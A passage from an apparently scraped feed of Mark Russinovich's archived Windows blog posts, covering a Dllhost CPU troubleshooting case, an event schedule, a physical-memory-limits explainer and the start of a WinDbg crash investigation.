BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" width="348" /> </P> <BR /> <P> I also set an Include filter for paths matching C:\Windows\System32\Dllhost.exe, minimized it, and let my wife have the system back. </P> <BR /> <P> The next day I came home from work, sat down at the computer and saw from Process Explorer that Dllhost.exe was back at it, consuming 50% of the CPU. I suspect that because it's a dual-core system, the problem had been showing up regularly, but my wife hadn't noticed it because the remaining CPU capacity was enough to mask it (another good reason to buy multi-core processors!). I brought Process Monitor to the foreground and noted it had seen 114,000 Dllhost operations, which was obviously way too many to scan through individually. I searched for "sonicmp4" and found a reference in a Registry query near the end of the trace: </P> <BR /> <P> <IMG alt="image" border="0" height="74" mce_src="https://msdnshared.blob.core.windows.net/media/TNBlogsFS/BlogFileStorage/blogs_technet/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121064iCD48A04C5D7EC4C5" width="550" /> </P> <BR /> <P> The query is of a COM object registration for the demultiplexer. Because the COM object is a 3rd-party DLL, I was certain that that COM Class ID (CLSID) isn't hard-coded into Windows, so I went back to the first entry in the trace and searched for "A7DD215", the first few characters of the CLSID. The search found a match a few thousand operations earlier: </P> <BR /> <P> <IMG alt="image" border="0" height="113" mce_src="https://msdnshared.blob.core.windows.net/media/TNBlogsFS/BlogFileStorage/blogs_technet/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_6.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121065i30383E3D723384D4" width="550" /> </P> <BR /> <P> The CLSID was in the name of a Registry key under another COM object registration. I Windows-Live-searched (that just rolls off the tongue, doesn't it?) for the parent CLSID and found this KB article that explains that the registry key is where <A href="#" mce_href="#" target="_blank"> DirectShow </A> filters register: <A href="#" mce_href="#" title="http://msdn.microsoft.com/en-us/library/ms787560(VS.85).aspx" target="_blank"> http://msdn.microsoft.com/en-us/library/ms787560(VS.85).aspx </A> I took a look at the stack for the particular query to confirm that's the reason Dllhost was reading from there: </P> <BR /> <P> <IMG alt="image" border="0" height="332" mce_src="https://msdnshared.blob.core.windows.net/media/TNBlogsFS/BlogFileStorage/blogs_technet/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_8.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_8.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121066i52C45F8FFB4D73B9" width="382" /> </P> <BR /> <P> I was now confident that I could simply rename the Sonic filter registration key to prevent its use. I never delete registry keys when performing this kind of troubleshooting just in case the change disables important functionality or somehow breaks something else. I had seen from the traces that the thumbnail cache generator had come across an AVI file that caused it to load the Sonic demultiplexer, a format Windows is obviously able to handle on its own, so I was pretty sure things would continue to work. After terminating the Dllhost and making the change, I browsed to the same folder, deleted the thumbnails, and confirmed that there was no reduced functionality as far as I could tell. I then used Roxio to successfully burn a DVD with a number of AVI files. This case was closed. </P> <BR /> <P> My wife's system was now usable again, and though I wasn't able to close the Flash-related part of the case, at least I knew the cause and could keep an eye out for updates. More importantly, by solving the Dllhost part of the case, even if Flash went crazy again, her system would still be usable and she wouldn't be filing a critical support incident for it with me - thanks to Process Explorer and Process Monitor. </P> </BODY></HTML> Thu, 27 Jun 2019 06:44:21 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-slooooow-system/ba-p/723708 MarkRussinovich 2019-06-27T06:44:21Z Where in the World is Mark Russinovich? https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/where-in-the-world-is-mark-russinovich/ba-p/723675 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Sep 08, 2008 </STRONG> <BR /> <P> I haven't had a chance to write a new post in a while because I've been busy working on Windows, new Sysinternals tools and enhancements to existing ones, and the 5th edition of Windows Internals, so I thought that I'd update you on my speaking schedule, book status, and what's going on at Sysinternals. </P> <P> My next event is one that anyone can easily attend live, or via recorded webcast: it's the third virtual roundtable in the Microsoft Springboard series of round tables I've been hosting. <A href="#" target="_blank"> Springboard </A> is program designed to connect IT pros with practical information, guidance and tools to help them in their evaluation and deployment of Windows without marketing fluff getting in the way. This next round table is on September 24 and takes on the topic of performance. As usual, we'll have a panel of MVPs and customers sharing their experiences and real world tips with you. You can sign up to watch it live and find the contact to send in your questions ahead of time <A href="#" target="_blank"> here </A> . </P> <P> In addition to the round table, I've got a full conference schedule for the Fall, including three keynotes: </P> <BLOCKQUOTE> <P> <A href="#" target="_blank"> TechEd Hong Kong </A> , October 8-10, Wanchai, Hong Kong </P> <P> <A href="#" target="_blank"> Virtualization Congress </A> , October 15-16, London, UK </P> <P> <A href="#" target="_blank"> Microsoft Platforma </A> , December 4-5, Moscow, Russia </P> </BLOCKQUOTE> <P> I'm also returning to one of my favorite conferences, TechEd EMEA IT Pros. I love reconnecting with my speaker friends, the enthusiastic European attendees, and Barcelona. I'm delivering several sessions, including an updated " <A href="#" target="_blank"> The Case of the Unexplained... </A> ", complete with all new examples. </P> <BLOCKQUOTE> <P> <A href="#" target="_blank"> TechEd EMEA IT Pro </A> , November 3-7, Barcelona, Spain </P> </BLOCKQUOTE> <P> I hope to see you at one of these events, and if attend one of my sessions please stop by and say hello. </P> <P> The book, which is updated to focus exclusively on Windows Vista and Windows Server 2008, is well along and we're on track for publication in January. I'm writing it again with <A href="#" target="_blank"> David Solomon </A> , my coauthor on the previous two editions, and <A href="#" target="_blank"> Alex Ionescu </A> , who is new to this edition and contributing great content. With all the new information and experiments, the book is going to be around 250 pages longer, making it its bed-time reading value stretch even longer. You can find information on the book on its official home page <A href="#" target="_blank"> here </A> . </P> <P> Finally, Bryce and I have some exciting Sysinternals updates, including a major Process Monitor update and enhancements to Process Explorer, planned for release in the coming weeks and months. </P> <P> If you'd like to hear directly from me on what I'm up to at Microsoft, what's behind the Sysinternals operation, what new feature we're releasing in Process Monitor, and my views on Windows, operating system security, and more, check out my recent <A href="#" target="_blank"> interview with TechNet Edge </A> . </P> <BR /> </BODY></HTML> Thu, 27 Jun 2019 06:42:23 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/where-in-the-world-is-mark-russinovich/ba-p/723675 MarkRussinovich 2019-06-27T06:42:23Z Pushing the Limits of Windows: Physical Memory https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/pushing-the-limits-of-windows-physical-memory/ba-p/723674 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jul 21, 2008 </STRONG> <BR /> <P> </P> <P> This is the first blog post in a series I'll write over the coming months called Pushing the Limits of Windows that describes how Windows and applications use a particular resource, the licensing and implementation-derived limits of the resource, how to measure the resource’s usage, and how to diagnose leaks. To be able to manage your Windows systems effectively you need to understand how Windows manages physical resources, such as CPUs and memory, as well as logical resources, such as virtual memory, handles, and window manager objects. Knowing the limits of those resources and how to track their usage enables you to attribute resource usage to the applications that consume them, effectively size a system for a particular workload, and identify applications that leak resources. </P> <P> Here’s the index of the entire Pushing the Limits series. While they can stand on their own, they assume that you read them in order. </P> <BLOCKQUOTE> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Physical Memory </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Virtual Memory </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Paged and Nonpaged Pool </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Processes and Threads </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Handles </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: USER and GDI Objects – Part 1 </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: USER and GDI Objects – Part 2 </A> </P> </BLOCKQUOTE> <H3> Physical Memory </H3> <P> One of the most fundamental resources on a computer is physical memory. Windows' memory manager is responsible with populating memory with the code and data of active processes, device drivers, and the operating system itself. Because most systems access more code and data than can fit in physical memory as they run, physical memory is in essence a window into the code and data used over time. The amount of memory can therefore affect performance, because when data or code a process or the operating system needs is not present, the memory manager must bring it in from disk. </P> <P> Besides affecting performance, the amount of physical memory impacts other resource limits. For example, the amount of non-paged pool, operating system buffers backed by physical memory, is obviously constrained by physical memory. Physical memory also contributes to the system virtual memory limit, which is the sum of roughly the size of physical memory plus the maximum configured size of any paging files. Physical memory also can indirectly limit the maximum number of processes, which I'll talk about in a future post on process and thread limits. </P> <H3> Windows Server Memory Limits </H3> <P> Windows support for physical memory is dictated by hardware limitations, licensing, operating system data structures, and driver compatibility. The <A href="#" target="_blank"> Memory Limits for Windows Releases </A> page in MSDN documents the limits for different Windows versions, and within a version, by SKU. </P> <P> You can see physical memory support licensing differentiation across the server SKUs for all versions of Windows. For example, the 32-bit version of Windows Server 2008 Standard supports only 4GB, while the 32-bit Windows Server 2008 Datacenter supports 64GB. Likewise, the 64-bit Windows Server 2008 Standard supports 32GB and the 64-bit Windows Server 2008 Datacenter can handle a whopping 2TB. There aren't many 2TB systems out there, but the Windows Server Performance Team knows of a couple, including one they had in their lab at one point. Here's a screenshot of Task Manager running on that system: </P> <P> <IMG alt="image" border="0" height="451" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPhysicalMemory_878B/image_thumb_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121037i8A1A9892115C2119" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="566" /> </P> <P> The maximum 32-bit limit of 128GB, supported by Windows Server 2003 Datacenter Edition, comes from the fact that structures the Memory Manager uses to track physical memory would consume too much of the system's virtual address space on larger systems. The Memory Manager keeps track of each page of memory in an array called the PFN database and, for performance, it maps the entire PFN database into virtual memory. Because it represents each page of memory with a 28-byte data structure, the PFN database on a 128GB system requires about 980MB. 32-bit Windows has a 4GB virtual address space defined by hardware that it splits by default between the currently executing user-mode process (e.g. Notepad) and the system. 980MB therefore consumes almost half the available 2GB of system virtual address space, leaving only 1GB for mapping the kernel, device drivers, system cache and other system data structures, making that a reasonable cut off: </P> <P> <IMG alt="image" border="0" height="240" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPhysicalMemory_3E55/image_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121038i10B7969ABC196455" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="300" /> </P> <P> That's also why the memory limits table lists lower limits for the same SKU's when booted with 4GB tuning (called 4GT and enabled with the Boot.ini's /3GB or /USERVA, and Bcdedit's /Set IncreaseUserVa boot options), because 4GT moves the split to give 3GB to user mode and leave only 1GB for the system. For improved performance, Windows Server 2008 reserves more for system address space by lowering its maximum 32-bit physical memory support to 64GB. </P> <P> The Memory Manager could accommodate more memory by mapping pieces of the PFN database into the system address as needed, but that would add complexity and possibly reduce performance with the added overhead of map and unmap operations. It's only recently that systems have become large enough for that to be considered, but because the system address space is not a constraint for mapping the entire PFN database on 64-bit Windows, support for more memory is left to 64-bit Windows. </P> <P> The maximum 2TB limit of 64-bit Windows Server 2008 Datacenter doesn't come from any implementation or hardware limitation, but Microsoft will only support configurations they can test. As of the release of Windows Server 2008, the largest system available anywhere was 2TB and so Windows caps its use of physical memory there. </P> <H3> Windows Client Memory Limits </H3> <P> 64-bit Windows client SKUs support different amounts of memory as a SKU-differentiating feature, with the low end being 512MB for Windows XP Starter to 128GB for Vista Ultimate and 192GB for Windows 7 Ultimate. All 32-bit Windows client SKUs, however, including Windows Vista, Windows XP and Windows 2000 Professional, support a maximum of 4GB of physical memory. 4GB is the highest physical address accessible with the standard x86 memory management mode. Originally, there was no need to even consider support for more than 4GB on clients because that amount of memory was rare, even on servers. </P> <P> However, by the time Windows XP SP2 was under development, client systems with more than 4GB were foreseeable, so the Windows team started broadly testing Windows XP on systems with more than 4GB of memory. Windows XP SP2 also enabled Physical Address Extensions (PAE) support by default on hardware that implements no-execute memory because its required for Data Execution Prevention (DEP), but that also enables support for more than 4GB of memory. </P> <P> What they found was that many of the systems would crash, hang, or become unbootable because some device drivers, commonly those for video and audio devices that are found typically on clients but not servers, were not programmed to expect physical addresses larger than 4GB. As a result, the drivers truncated such addresses, resulting in memory corruptions and corruption side effects. Server systems commonly have more generic devices and with simpler and more stable drivers, and therefore hadn't generally surfaced these problems. The problematic client driver ecosystem led to the decision for client SKUs to ignore physical memory that resides above 4GB, even though they can theoretically address it. </P> <H3> 32-bit Client Effective Memory Limits </H3> <P> While 4GB is the licensed limit for 32-bit client SKUs, the effective limit is actually lower and dependent on the system's chipset and connected devices. The reason is that the physical address map includes not only RAM, but device memory as well, and x86 and x64 systems map all device memory below the 4GB address boundary to remain compatible with 32-bit operating systems that don't know how to handle addresses larger than 4GB. If a system has 4GB RAM and devices, like video, audio and network adapters, that implement windows into their device memory that sum to 500MB, 500MB of the 4GB of RAM will reside above the 4GB address boundary, as seen below: </P> <P> <IMG alt="image" border="0" height="263" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPhysicalMemory_878B/image_thumb_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121039i7E8269B9271C660F" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="256" /> </P> <P> The result is that, if you have a system with 3GB or more of memory and you are running a 32-bit Windows client, you may not be getting the benefit of all of the RAM.&nbsp; On Windows 2000, Windows XP and Windows Vista RTM, you can see how much RAM Windows has accessible to it in the System Properties dialog, Task Manager's Performance page, and, on Windows XP and Windows Vista (including SP1), in the Msinfo32 and Winver utilities. On Window Vista SP1, some of these locations changed to show installed RAM, rather than available RAM, as documented in this <A href="#" target="_blank"> Knowledge Base article </A> . </P> <P> On my 4GB laptop, when booted with 32-bit Vista, the amount of physical memory available is 3.5GB, as seen in the Msinfo32 utility: </P> <P> <IMG alt="image" border="0" height="59" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPhysicalMemory_878B/image_thumb_8.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121040i7A1417E484652CAA" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="274" /> </P> <P> You can see physical memory layout with the <A href="#" target="_blank"> Meminfo </A> tool by <A href="#" target="_blank"> Alex Ionescu </A> (who's contributing to the 5th Edition of the <A href="#" target="_blank"> Windows Internals </A> that I'm coauthoring with <A href="#" target="_blank"> David Solomon </A> ). Here's the output of Meminfo when I run it on that system with the -r switch to dump physical memory ranges: </P> <P> <IMG alt="image" border="0" height="151" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPhysicalMemory_878B/image_thumb_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121041i4AA3C3702DCF35A4" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="550" /> </P> <P> Note the gap in the memory address range from page 9F0000 to page 100000, and another gap from DFE6D000 to FFFFFFFF (4GB). However, when I boot that system with 64-bit Vista, all 4GB show up as available and you can see how Windows uses the remaining 500MB of RAM that are above the 4GB boundary: </P> <P> <IMG alt="image" border="0" height="137" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPhysicalMemory_878B/image_thumb_9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121042i40E3EAD02D59A9AF" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="550" /> </P> <P> What's occupying the holes below 4GB? The Device Manager can answer that question. To check, launch "devmgmt.msc", select Resources by Connection in the View Menu, and expand the Memory node. On my laptop, the primary consumer of mapped device memory is, unsurprisingly, the video card, which consumes 256MB in the range E0000000-EFFFFFFF: </P> <P> <IMG alt="image" border="0" height="222" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPhysicalMemory_878B/image_thumb_10.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121043i50E52B9758F5B8B3" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="550" /> </P> <P> Other miscellaneous devices account for most of the rest, and the PCI bus reserves additional ranges for devices as part of the conservative estimation the firmware uses during boot. </P> <P> The consumption of memory addresses below 4GB can be drastic on high-end gaming systems with large video cards. For example, I purchased one from a boutique gaming rig company that came with 4GB of RAM and two 1GB video cards. I hadn't specified the OS version and assumed that they'd put 64-bit Vista on it, but it came with the 32-bit version and as a result only 2.2GB of the memory was accessible by Windows. You can see a giant memory hole from 8FEF0000 to FFFFFFFF in this Meminfo output from the system after I installed 64-bit Windows: </P> <P> <IMG alt="image" border="0" height="139" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPhysicalMemory_878B/image_thumb_11.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121044i698749E2C1A1F3D2" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="550" /> </P> <P> Device Manager reveals that 512MB of the over 2GB hole is for the video cards (256MB each), and it looks like the firmware has reserved more for either dynamic mappings or because it was conservative in its estimate: </P> <P> <IMG alt="image" border="0" height="416" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPhysicalMemory_878B/image_thumb_12.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121045i26EFB039D1FD4324" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="550" /> </P> <P> Even systems with as little as 2GB can be prevented from having all their memory usable under 32-bit Windows because of chipsets that aggressively reserve memory regions for devices. Our shared family computer, which we purchased only a few months ago from a major OEM, reports that only 1.97GB of the 2GB installed is available: </P> <P> <IMG alt="image" border="0" height="61" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPhysicalMemory_878B/image_thumb_14.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121046iA45FC4F0A8121F2F" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="281" /> </P> <P> The physical address range from 7E700000 to FFFFFFFF is reserved by the PCI bus and devices, which leaves a theoretical maximum of 7E700000 bytes (1.976GB) of physical address space, but even some of that is reserved for device memory, which explains why Windows reports 1.97GB. </P> <P> <IMG alt="image" border="0" height="221" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPhysicalMemory_878B/image_thumb_15.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121047iD4B5FA50BB9AD4CE" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="439" /> </P> <P> Because device vendors now have to submit both 32-bit and 64-bit drivers to Microsoft's Windows Hardware Quality Laboratories (WHQL) to obtain a driver signing certificate, the majority of device drivers today can probably handle physical addresses above the 4GB line. However, 32-bit Windows will continue to ignore memory above it because there is still some difficult to measure risk, and OEMs are (or at least should be) moving to 64-bit Windows where it's not an issue. </P> <P> The bottom line is that you can fully utilize your system's memory (up the SKU's limit) with 64-bit Windows, regardless of the amount, and if you are purchasing a high end gaming system you should definitely ask the OEM to put 64-bit Windows on it at the factory. </P> <H3> Do You Have Enough Memory? </H3> <P> Regardless of how much memory your system has, the question is, is it enough? Unfortunately, there's no hard and fast rule that allows you to know with certainty. There is a general guideline you can use that's based on monitoring the system's "available" memory over time, especially when you're running memory-intensive workloads. Windows defines available memory as physical memory that's not assigned to a process, the kernel, or device drivers. As its name implies, available memory is available for assignment to a process or the system if required. The Memory Manager of course tries to make the most of that memory by using it as a file cache (the standby list), as well as for zeroed memory (the zero page list), and Vista's Superfetch feature prefetches data and code into the standby list and prioritizes it to favor data and code likely to be used in the near future. </P> <P> If available memory becomes scarce, that means that processes or the system are actively using physical memory, and if it remains close to zero over extended periods of time, you can probably benefit by adding more memory. There are a number of ways to track available memory. On Windows Vista, you can indirectly track available memory by watching the Physical Memory Usage History in Task Manager, looking for it to remain close to 100% over time. Here's a screenshot of Task Manager on my 8GB desktop system (hmm, I think I might have too much memory!): </P> <P> <IMG alt="image" border="0" height="285" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPhysicalMemory_878B/image_thumb_17.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121048i87B78C52C2AA4D6E" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="428" /> </P> <P> On all versions of Windows you can graph available memory using the Performance Monitor by adding the Available Bytes counter in the Memory performance counter group: </P> <P> <IMG alt="image" border="0" height="315" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPhysicalMemory_878B/image_thumb_16.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121049iA3715C835EBE4A7C" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="411" /> </P> <P> You can see the instantaneous value in <A href="#" target="_blank"> Process Explorer's </A> System Information dialog, or, on versions of Windows prior to Vista, on Task Manager's Performance page. </P> <H3> Pushing the Limits of Windows </H3> <P> Out of CPU, memory and disk, memory is typically the most important for overall system performance. The more, the better. 64-bit Windows is the way to go to be sure that you're taking advantage of all of it, and 64-bit Windows can have other performance benefits that I'll talk about in a future Pushing the Limits blog post when I talk about virtual memory limits. </P> <BLOCKQUOTE> <A href="#" target="_blank"> </A> </BLOCKQUOTE> </BODY></HTML> Thu, 27 Jun 2019 06:42:18 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/pushing-the-limits-of-windows-physical-memory/ba-p/723674 MarkRussinovich 2019-06-27T06:42:18Z The Case of the Random IE and WMP Crashes https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-random-ie-and-wmp-crashes/ba-p/723654 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jun 02, 2008 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> When I experienced a crash in Internet Explorer (IE) on my home 64-bit gaming system one day, I chalked it up to random third-party plug-in memory corruption. I moved on, but a few days later had another crash in IE. Then, Windows Media Player (WMP) started crashing every third or fourth time I used it: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> <SHAPETYPE coordsize="21600,21600" filled="f" id="_x0000_t75" preferrelative="t" spt="75" path="m@4@5l@4@11@9@11@9@5xe" stroked="f"> <STROKE joinstyle="miter"> </STROKE> <FORMULAS> <F eqn="if lineDrawn pixelLineWidth 0"> </F> <F eqn="sum @0 1 0"> </F> <F eqn="sum 0 0 @1"> </F> <F eqn="prod @2 1 2"> </F> <F eqn="prod @3 21600 pixelWidth"> </F> <F eqn="prod @3 21600 pixelHeight"> </F> <F eqn="sum @0 0 1"> </F> <F eqn="prod @6 1 2"> </F> <F eqn="prod @7 21600 pixelWidth"> </F> <F eqn="sum @8 21600 0"> </F> <F eqn="prod @7 21600 pixelHeight"> </F> <F eqn="sum @10 21600 0"> </F> </FORMULAS> <PATH gradientshapeok="t" connecttype="rect" extrusionok="f"> </PATH> <LOCK aspectratio="t" ext="edit"> </LOCK> </SHAPETYPE> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="393" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064673/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064673/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121026iF43EEC228C2F97A4" style="WIDTH: 550px; HEIGHT: 393px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Crashes in different programs seemed to point at a more fundamental problem. I had over-clocked the CPU, so I speculated that the rash of crashes were a side-effect of CPU overheating and reluctantly dialed back the clock multiplier to the factory specification. <SPAN style="mso-spacerun: yes"> </SPAN> To my dismay, however, the crashes continued. My next theory was that I had bad RAM, but the Windows Vista Memory Diagnostic failed to identify any problems. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Hardware problems seemingly cleared, my next move was to look at the process crash dumps to see if they held any clues. But first I had to find a crash dump to look at. Windows XP’s Application Error Reporting process always generates a dump before showing you the application crash dialog, and you can find the location of the dump by clicking to see the report details and then viewing the report’s technical information: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="231" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064674/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064674/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121027iFC78BC3E387B8408" style="WIDTH: 550px; HEIGHT: 231px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Windows Vista’s corresponding dialog doesn’t offer a way to get at a report’s technical information and it doesn’t generate a dump unless Microsoft’s Windows Error Reporting (WER) servers request it, which they only do for crashes reported in high volumes. Fortunately, WerFault, the process that presents the dialog, keeps the crashed process around until you press the Close Program button, which offers an opportunity to attach to the process with a debugger and examine it. You can see WerFault’s handle to a crashed Windows Media Player process in <A class="" href="#" mce_href="#" target="_blank"> Process Explorer </A> : </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="266" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064685/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064685/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121028iA7738E8249CF0A26" style="WIDTH: 357px; HEIGHT: 266px" width="357" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The next time I had a crash, I launched WinDbg, the Windows Debugger from the <A class="" href="#" mce_href="#" target="_blank"> Debugging Tools for Windows </A> package that’s available for free download from Microsoft. After making sure that I had the symbol configuration set to point at the Microsoft public symbol server (e.g. srv*c:\symbols*<A href="#" target="_blank">http://msdl.microsoft.com/download/symbols</A>) in the Symbol File Path dialog, I went to the File menu and selected the “Attach to a Process...” menu entry: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="202" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064676/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064676/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121029iFB7537F356E67C50" style="WIDTH: 318px; HEIGHT: 202px" width="318" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> That opens the WinDbg process selection dialog, which I scrolled through to find the crashed process. When I selected the process, WinDbg opened it and presented the same interface it does when it&nbsp;loads a crash dump, except that when you load a crash dump, you can execute the <I style="mso-bidi-font-style: normal"> !analyze </I> debugger command that uses heuristics to try and pinpoint the cause of the crash; when you perform a debugger attach, an analysis will just tell you what you already know, that you attached with a debugger: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="438" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064677/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3064677/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121030i5516302C3F5ECAC6" style="WIDTH: 550px; HEIGHT: 438px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Looking for a potential cause of a crash when attached requires looking at the stack of each thread in the process, so I opened the Processes and Threads and Call Stack dialogs in the View menu: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> <SPAN 